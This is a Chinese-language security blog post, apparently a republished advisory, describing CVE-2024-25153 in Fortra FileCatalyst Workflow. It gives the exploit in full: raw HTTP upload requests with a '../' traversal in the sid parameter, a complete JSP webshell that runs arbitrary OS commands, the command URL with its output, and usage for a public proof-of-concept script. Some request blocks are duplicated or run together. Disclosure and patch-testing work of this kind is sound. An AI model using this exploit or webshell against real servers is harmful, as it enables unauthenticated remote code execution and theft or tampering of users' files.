CVE-2024-25153-Fortra FileCatalyst RCE漏洞

漏洞介绍

CVE-2024-25153是Fortra FileCatalyst中的一个严重的不安全文件上传和目录遍历漏洞，允许未经身份验证的远程攻击者在 Web 服务器上获取远程代码执行 (RCE)。这会影响 5.1.6 Build 114 之前的 Fortra FileCatalyst Workflow 5.x。

我们正在发布针对此漏洞的完整概念验证漏洞，可以在下面的GitHub上找到。

https://github.com/nettitude/CVE-2024-25153

文件上传分析-FtpServlet

在 FileCatalyst 工作流程中，文件上传过程涉及对以下 URL 的 POST 请求。

https://{url}/workflow/servlet/ftpservlet

https://{url}/workflow/servlet/ftpservlet

下面是一个伪请求示例：

POST /workflow/servlet/ftpservlet?wf=octetStream&r=&h=X&u=X&p=&prt=21&d=/&ff=X&b=X&fs=X&dlm=X&c=PUT HTTP/1.1Host: {url}Content-Type: application/octet-stream Cookie: JSESSIONID={SESSION}X-File-Type: image/pngX-File-Name: upload.png
{file contents}

POST /workflow/servlet/ftpservlet?wf=octetStream&r=&h=X&u=X&p=&prt=21&d=/&ff=X&b=X&fs=X&dlm=X&c=PUT HTTP/1.1Host: {url}Content-Type: application/octet-stream Cookie: JSESSIONID={SESSION}X-File-Type: image/pngX-File-Name: upload.png
{file contents}

POST /workflow/servlet/ftpservlet?wf=octetStream&r=&h=X&u=X&p=&prt=21&d=/&ff=X&b=X&fs=X&dlm=X&c=PUT HTTP/1.1
Host: {url}
Content-Type: application/octet-stream
Cookie: JSESSIONID={SESSION}
X-File-Type: image/png
X-File-Name: upload.png

{file contents}

POST /workflow/servlet/ftpservlet?wf=octetStream&r=&h=X&u=X&p=&prt=21&d=/&ff=X&b=X&fs=X&dlm=X&c=PUT HTTP/1.1Host: {url}Content-Type: application/octet-stream Cookie: JSESSIONID={SESSION}X-File-Type: image/pngX-File-Name: upload.png
{file contents}

尽管此请求需要会话令牌，但默认情况下，FileCatalyst Workflow允许公共用户匿名登录。此凭据或有效凭据是利用 CVE-2024-25153 的要求。

上传命令执行脚本

通过将sid参数处替换为点-点-斜杠（../），我们能够将服务器端可执行文件shell.jsp上传到uploadtemp目录之外的位置。

对于读到这里的任何人来说，不要尝试将文件上传到顶级目录，这一点非常重要，因为这可能会删除整个应用程序。

POST /workflow/servlet/ftpservlet?wf=octetStream&r=&h=X&u=X&p=&prt=21&d=/&ff=X&b=X&fs=X&dlm=X&c=PUT&sid=nettitude/../../nettitude/ HTTP/1.1
Host: {url}
Content-Type: application/octet-stream
Cookie: JSESSIONID={SESSION}
X-File-Type: a
X-File-Name: shell.jsp

<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>

上面的上传请求成功，并且 shell.jsp 被放置在 Web 目录中的以下位置：

https://{url}/workflow/nettitude/shell.jsp

https://{url}/workflow/nettitude/shell.jsp

在实际环境中，应用程序可能需要不安全的权限才能在 Web 根目录中创建新目录。然而，在安全评估过程中观察到了这种配置，发现了 CVE-2024-25153，并且漏洞利用成功。

远程代码执行

上传 Webshell 后，就可以使用它来执行操作系统命令，如下所示：

https://{url}/workflow/nettitude/shell.jsp?cmd=whoami

https://{url}/workflow/nettitude/shell.jsp?cmd=whoami

Response：

nt authoritylocal service

nt authoritylocal service

以上表明可以实现操作系统级别的访问，攻击者可以读取或修改系统上的数据，可能包括其他用户上传的文件。这带来了严重的机密性、完整性和可用性风险。

同样，在FileCatalyst Direct中，也观察到同样存在漏洞的 FtpServlet：

https://www.goanywhere.com/products/filecatalyst/filecatalyst-direct

https://www.goanywhere.com/products/filecatalyst/filecatalyst-direct

https://{url}:12480/servlet/ftpservlet

https://{url}:12480/servlet/ftpservlet

这似乎具有相同的功能，并且也被确定可以按照上述步骤进行利用。

概念验证漏洞利用

我们已经为 CVE-2024-25153 创建了完整的概念验证漏洞，可以在下面的 GitHub 上找到。

https://github.com/nettitude/CVE-2024-25153

https://github.com/nettitude/CVE-2024-25153

要使用它，语法如下：

python CVE-2024-25153.py --host <hostname> --port <port> --url <url> --cmd <command>

./CVE-2024-25153.py --host <hostname> --port <port> --url <url> --cmd <command>

该工具将执行以下操作：
自动检测是否启用匿名登录
获取有效的会话令牌
上传具有伪随机生成的文件名的命令执行脚本
执行操作系统命令

上一：阿里云OSS转发HTTP流量上线工具

下一：绕过Defender转储和提取 LSASS

微信扫描关注我们

周一至周五（工作日） 09:00-18:00
周末/法定节假日（值班）09:00-18:00

联系人：徐泮

手机：17620028178

邮件：1536715554@qq.com

地址：广州市天河区思成路19号五号楼2F C29

热门

CVE-2024-25153-Fortra FileCatalyst RCE漏洞